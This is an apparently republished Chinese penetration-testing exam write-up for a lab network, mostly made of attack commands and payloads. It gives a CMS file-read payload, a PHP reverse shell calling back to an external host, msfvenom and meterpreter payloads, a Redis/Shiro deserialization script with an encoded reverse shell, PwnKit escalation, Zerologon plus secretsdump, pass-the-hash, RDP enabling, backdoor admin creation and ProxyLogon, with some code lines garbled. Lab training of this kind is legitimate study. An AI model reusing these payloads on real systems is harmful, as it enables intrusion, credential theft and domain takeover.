暗月渗透测试五月考核文章第二篇

暗月渗透测试五月考核文章第二篇
2023-5-22 10:35:8 Author: moonsec(查看原文) 阅读量:32 收藏

本次sunday靶场通关视频已经制作成培训课程。

5.20 还有活动价

如需学习可参与暗月的渗透测试培训

扫一扫添加好友咨询学习

涉及考点

这次考核的内容涉及到 php代码审计和java代码审计。

内网比较简单，只要进入域内拿到域控问题都不大。

找到WEB入口点进入内网再进行渗透就很容易获取域控的权限了。

拓扑图

考核情况

本次参与的人数共100人成功通过的人数是6人虽然通过率不高但是对此还是比较满意。

以下是通过考核的同学的第二篇都是干货。

WEB123

访问url，是shirneCMS，信息收集后，这个CMS有任意文件读取漏洞，后台地址

http://103.149.90.210/index.php/admin

对照源码读配置文件，源码：

https://gitee.com/shirnecn/ShirneCMS/tree/master/src

读取数据库配置文件

payload

http://103.149.90.210/static/ueditor/php/controller.php? action=proxy&remote=php://filter/convert.base64-encode|convert.base64-  encode|convert.base64-encode|convert.base64-encode|convert.base64- encode|convert.base64- encode/resource=../../../config/database.php&maxwidth=-1&referer=test

关键信息

return [
// 数据库类型
'type'
// 服务器地址
'hostname'
// 数据库名
'database'
// 用户名
'username'
// 密码
'password'
=> 'mysql',
=> 'localhost',=> 'cms',
=> 'root',
=> 'vVICDU1Erw',

有用户名密码，但是不能远程连接

用yakit扫到了phpmyadmin， http://103.149.90.210:80/phpmyadmin/index.php

使用读到的数据库用户名密码登录，登录后找存网站后台管理员用户的表，是加盐的md5

下载源码，找加密方法，全局搜索$salt

跟进encode_passwd

可以看出它的加密方法就是md5（随机生成一个8位的salt+密码）写一个生成密码的代码

<?php
include ('application/common.php');
$salt=random_str(8);// 定义待加密的密码和盐值
$password = '[email protected]';
// 调用 encode_password () 函数进行加密
$encrypted_password = encode_password ($password, $salt);
// 输出加密后的结果
echo $encrypted_password . "\n" ; echo $salt;

直接浏览器打开就可以得到password，salt

有了密码后直接去phpmyadmin创建一个管理员用户

9a776d9a18b61b59dd42844f2f39c071 BzqYHwbz

登录后台http://103.149.90.210/index.php/admin ，后台有一个文件包含漏洞

rrr/[email protected]

分类管理-添加分类，分类别名设置为：../../../../../../tmp

在phpmyadmin写一个反弹shell的php文件到/tmp下

select '<?php system("bash -c \'bash -i >& /dev/tcp/1.1.1.1/9090 0>&1\'"); ?>' into outfile '/tmp/view.tpl'

创建一个文章

在vps监听

nc -lnvp 9090

访问文章，收到了反弹的shell

msf生成一个马，msf启动监听，把马上传到网站服务上，给执行权限运行

msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=124.221.251.187 lport=9091 -f elf
-o xx

use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp set lhost 127.0.0.1
set lport 9091 run

chmod +x xx
./xx

拿到shell后查看执行whoami查看系统和内核版本

meterpreter > sysinfo
Computer
OS
: 192.168.10.174
: Ubuntu 16.04 (Linux 4.13.0-36-generic)
Architecture : x64
BuildTuple	: x86_64-linux-musl Meterpreter : x64/linux

上传提权漏洞检测脚本 linux-exploit-suggester.sh使用cve-20210-4034提权

https://github.com/berdav/CVE-2021-4034

meterpreter > upload /home/kali/桌面/cve-2021-4034.sh meterpreter > shell
python3 -c 'import pty; pty.spawn("/bin/bash")'
[email protected]:~/html/public/xxx$ chmod 777 cve-2021-4034.sh 
[email protected]:~/html/public/xxx$ ./cve-2021-4034.sh

提权之后用root权限运行cs的马

到root目录下找flag

把root权限的shell给msf也来一个，直接运行之前传的msf马就行

WEB

上传fscan扫描192.168.10.135，有redis

[+] Redis:192.168.10.175:6379 abc123 file:/var/lib/redis/dump.rdb 
[+] Redis:192.168.10.175:6379 like can write /var/spool/cron/

msf运行代理

使用代理连接redis，查看信息,是Linux proxychains4 redis-cli -h 192.168.10.175 -p 6379

192.168.10.175:6379> info
# Server redis_version:5.0.7 redis_git_sha1:00000000 redis_git_dirty:0
redis_build_id:66bd629f924ac924 redis_mode:standalone
os:Linux 5.4.0-148-generic x86_64 arch_bits:64 multiplexing_api:epoll atomicvar_api:atomic-builtin gcc_version:9.3.0
process_id:912 run_id:904aee777d5087ca561c0934c5dd14e5229a0893 tcp_port:6379

利用脚本反序列化反弹shell

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC9pcC85MDkwIDA+JjE=}|{base64,- d}|{bash,-i}

import pyyso import socket
s=socket.socket() s.connect(("192.168.10.175",6379))
redis_password = "abc123"
s.send (b"*2\r\n$4\r\nAUTH\r\n$" + str (len (redis_password)).encode () + b"\r\n" + redis_password.encode () + b"\r\n")
whatever=b"yuy" key=b"shiro:session:"+whatever value=pyyso.cb1v192("bash -c
{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC9pcC85MDkwIDA+JjE=}|{base64,-d}|
{bash,-i}") s.send(b"\x2a\x33\x0d\x0a\x24\x33\x0d\x0aSET\r\n\x24"+str(len(key)).encode()+b"\r\n"+k  ey+b"\r\n\x24"+str(len(value)).encode()+b"\r\n"+value+b"\r\n")
if b"+OK" in s.recv(3): print("success")

远程下载msf马，反弹shell到msf信息收集

meterpreter > sysinfo
Computer
OS
: 192.168.10.175
: Ubuntu 20.04 (Linux 5.4.0-148-generic)
Architecture : x64
BuildTuple	: x86_64-linux-musl Meterpreter : x64/linux

上传漏洞检测脚本进行检测提权漏洞

Available information:
Kernel version: 5.4.0 Architecture: x86_64 Distribution: ubuntu Distribution version: 20.04
Additional checks (CONFIG_*, sysctl entries, custom Bash commands): performed Package listing: from current OSSearching among:
81 kernel space exploits
49 user space exploits Possible Exploits:
cat: write error: Broken pipe cat: write error: Broken pipe
[+] [CVE-2022-2586] nft_object UAF
Details: https://www.openwall.com/lists/oss-security/2022/08/29/5 Exposure: probable
Tags: [ ubuntu=(20.04) ]{kernel:5.12.13}
Download URL: https://www.openwall.com/lists/oss-security/2022/08/29/5/1 Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
[+] [CVE-2021-4034] PwnKit
Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt Exposure: probable
Tags: [ ubuntu=10|11|12|13|14|15|16|17|18|19|20|21
],debian=7|8|9|10|11,fedora,manjaro
Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main [+] [CVE-2021-3156] sudo Baron Samedit
Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based- overflow-sudo.txt
Exposure: probable
Tags: mint=19,[ ubuntu=18|20 ], debian=10
Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main [+] [CVE-2021-3156] sudo Baron Samedit 2
Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based- overflow-sudo.txt
Exposure: probable
Tags: centos=6|7|8,[ ubuntu=14|16|17|18|19|20 ], debian=9|10
Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
Details: https://google.github.io/security-research/pocs/linux/cve-2021- 22555/writeup.html
Exposure: probable
Tags: [ ubuntu=20.04 ]{kernel:5.8.0-*}
Download URL: https://raw.githubusercontent.com/google/security- research/master/pocs/linux/cve-2021-22555/exploit.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021- 22555/exploit.c
Comments: ip_tables kernel module must be loaded [+] [CVE-2022-32250] nft_object UAF (NFT_MSG_NEWSET)
Details: https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a- limited-uaf-in-nf_tables-cve-2022-32250/
https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/  Exposure: less probable
Tags: ubuntu=(22.04){kernel:5.15.0-27-generic}
Download URL: https://raw.githubusercontent.com/theori-io/CVE-2022-32250- exploit/main/exp.c
Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN) [+] [CVE-2017-5618] setuid screen v4.5.0 LPE
Details: https://seclists.org/oss-sec/2017/q1/184 Exposure: less probable
Download URL: https://www.exploit-db.com/download/https://www.exploit- db.com/exploits/41154

msf搜索提权漏洞

run post/multi/recon/local_exploit_suggester
[*] 127.0.0.1 - Collecting local exploits for x64/linux... [*] 127.0.0.1 - 176 exploit checks are being tried...
[+] 127.0.0.1 - exploit/linux/local/cve_2021_3493_overlayfs: The target appears to be vulnerable.
[+] 127.0.0.1 - exploit/linux/local/cve_2022_0995_watch_queue: The target appears to be vulnerable.
[+] 127.0.0.1 - exploit/linux/local/su_login: The target appears to be vulnerable. [*] Running check method for exploit 57 / 57
[*] 127.0.0.1 - Valid modules for session 45:
=============================
#	Name	Potentially
Vulnerable? Check Result
-
1 exploit/linux/local/cve_2021_3493_overlayfs
The target appears to be vulnerable.
Yes
2 exploit/linux/local/cve_2022_0995_watch_queue
The target appears to be vulnerable.
Yes
3 exploit/linux/local/su_login
The target appears to be vulnerable.
Yes

cve、计划任务、suid都试了，无法提权

峰回路转在webshell上翻目录翻到了ssh的私钥

是在home/web找到的，所以尝试ssh链接web，但是不行，然后之前扫描192.168.10.172只开了22，所以直接连接172的root，连接成功了

PC1

ssh -T -i id_rsa [email protected] /bin/bash

AD2012

上传fscan扫描两台10段主机

有邮件服务器和域控,知道了域的FQDN

NetBios: 10.10.10.137	exchange.sunday.club [*]10.10.10.133
[->]ad2012
[->]10.10.10.133

使用cve-2020-1472的poc测试是否存在漏洞

python3 zerologon_tester.py ad2012 10.10.10.133

返回存在

Success! DC can be fully compromised by a Zerologon attack.

置空域控密码

proxychains4 python3 cve-2020-1472-exploit.py ad2012 10.10.10.133

导出hash

proxychains4 python3 secretsdump.py sunday.club/ad2012\[email protected] -no-pass sunday.club\Administrator:500:aad3b435b51404eeaad3b435b51404ee:7e6f1603cd213e33e773461  3258caffe

使用hash登录域控

python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:7e6f1603cd213e33e7734613258caffe sunday.club/[email protected]

开启3389

wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 netstat -an|find "3389"

允许防火墙通过

netsh firewall add portopening protocol = TCP port = 3389 name = rdp

创建管理员用户

net user cc [email protected] /add
net localgroup administrators cc /add

使用frp进行内网穿透，把10段网络代理出来

192.168.10.175运行frpc和frps frpc配置

[common]
server_addr = 1.1.1.1
server_port = 7000[socks] type = tcp
remote_port = 9098 
plugin = socks5

frps配置

[common] 
bind_port = 7000

192.168.10.172运行frpc

[common]
server_addr = 192.168.10.175
server_port = 7000[socks] type = tcp
remote_port = 9099 
plugin = socks5

远程桌面连接域控

EXchange

使用CVE-2021-26855+CVE-2021-27065实现RCE

.\ProxyLogon.py --host=10.10.10.137 [email protected] https://10.10.10.137/aspnet_client/WXcOasRuSA.aspx?command=Response.Write(new  ActivexObject("wscript.shell").exec("whoami").Stdout.ReadAll());
exec里替换命令即可但是没有成功

换个思路就是既然有域控hash，直接横移也可以用msf的psexec

#域控

use exploit/windows/smb/psexec
set payload windows/x64/meterpreter/bind_tcp set lport 9092
set rhost 10.10.10.133 set smbuser
set smbuser aministrator set smbuser administrator
set smbpass aad3b435b51404eeaad3b435b51404ee:7e6f1603cd213e33e7734613258caffe set smbdomain sunday.club
run

#邮件服务器，修改下IP就行 set rhost 10.10.10.137 run

Flag

moonsec_flag{bbb0ae8a2c7d0ecc589621699f28afde} moonsec_flag{17d03da6474ce8beb13b01e79f789e63}moonsec_flag{26d300091986f45ca21d1cd6b7b79832}moonsec_flag{6d4db5ff0c117864a02827bad3c361b9} moonsec_flag{a81c3d94aa192d3f87ed9f2fffec04fc}

文章来源: http://mp.weixin.qq.com/s?__biz=MzAwMjc0NTEzMw==&mid=2653587303&idx=1&sn=2f04af6fe357193fe718db231af83153&chksm=811b9125b66c1833077fd53b1de249665a97947d890483a2afc3afa1606746f9bdb477064412#rd
如有侵权请联系:admin#unsafe.sh